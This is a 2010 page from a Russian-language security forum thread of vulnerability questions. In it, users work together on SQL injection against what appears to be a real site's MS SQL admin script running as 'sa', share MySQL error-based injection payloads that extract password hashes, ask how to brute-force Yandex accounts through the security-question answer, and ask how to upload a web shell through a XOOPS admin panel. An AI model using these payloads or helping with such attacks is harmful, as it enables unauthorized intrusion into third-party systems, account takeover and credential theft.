HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1288 из 2422 « Первая < 288788118812381278 1284 1285 1286 1287 1288 1289 1290 1291 1292 12981338138817882288 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.05.2010, 22:42
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию
уже узнали спасибо
 
Ответить с цитированием

  #2  
Старый 14.05.2010, 01:46
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию
Значит есть один уязвимый веб ресурс 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' . нашёл значит уязвимый скрипт ,вывел версию :admin/complaintHandler.asp?id=1+or+1=@@version
Имя Базы Данных текущего юзера: admin/complaintHandler.asp?id=1%20or%201=(select%20db_na me())
Имя юзера владельца данной базой: admin/complaintHandler.asp?id=1%20or%201=(select%20syste m_user)-- = 'sa'

Вроде всё окей и всё выводится , но вот когда создаю запрос :
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- то в ответ получаю Record not found: 1 or 1=1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--

Зато когда создаю запрос : admin/complaintHandler.asp?id=1+or+1=(SELECT+TOP+1+colum n_NAME+FROM+INFORMATION_SCHEMA.columnS)-- колонки выводятся на ура !

Кто знает почему table_name не выводятся а с column_name всё впорядке ??
 
Ответить с цитированием

  #3  
Старый 14.05.2010, 01:56
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию
может это лишнее?
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
 
Ответить с цитированием

  #4  
Старый 14.05.2010, 02:04
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию
Цитата:
Сообщение от BrainDeaD  
может это лишнее?
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

При запросе: admin/complaintHandler.asp?id=1 (SELECT+%20TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES)-- получаю Microsoft OLE DB Provider for SQL Server error '80040e14'

sp_cursoropen/sp_cursorprepare: The statement parameter can only be a single select or a single stored procedure.
 
Ответить с цитированием

  #5  
Старый 14.05.2010, 02:11
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию
на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
 
Ответить с цитированием

  #6  
Старый 14.05.2010, 02:13
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию
Цитата:
Сообщение от BrainDeaD  
на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--


((
 
Ответить с цитированием

  #7  
Старый 14.05.2010, 13:51
ReckouNT
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738

Репутация: 2
По умолчанию
Народ, есть ли у кого база фамилий в женском склонении для брута? (Девичья фамилия матери)
Возможно ли побрутить яндекс этими фамилиями?
 
Ответить с цитированием

  #8  
Старый 14.05.2010, 15:59
SENIA
Постоянный
Регистрация: 22.11.2008
Сообщений: 344
Провел на форуме:
3863128

Репутация: 570
По умолчанию
Есть админка XOOPS cms. как залить шелл?
На форуме ничего путевого не нашел.
 
Ответить с цитированием

  #9  
Старый 14.05.2010, 16:46
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
По умолчанию
парочка общих вопросов накопилась

1. по mysql:
1a.
Код:
+or(1,1)=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)
как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b.
Код:
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a
как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида
Код:
$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)
и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?
Последний раз редактировалось DrakonHaSh; 14.05.2010 в 16:50..
 
Ответить с цитированием

  #10  
Старый 14.05.2010, 18:25
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
DrakonHaSh
https://forum.antichat.ru/thread119047.html

и П.С https://forum.antichat.ru/thread104591.html
 
Ответить с цитированием
Ответ
Страница 1288 из 2422 « Первая < 288788118812381278 1284 1285 1286 1287 1288 1289 1290 1291 1292 12981338138817882288 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.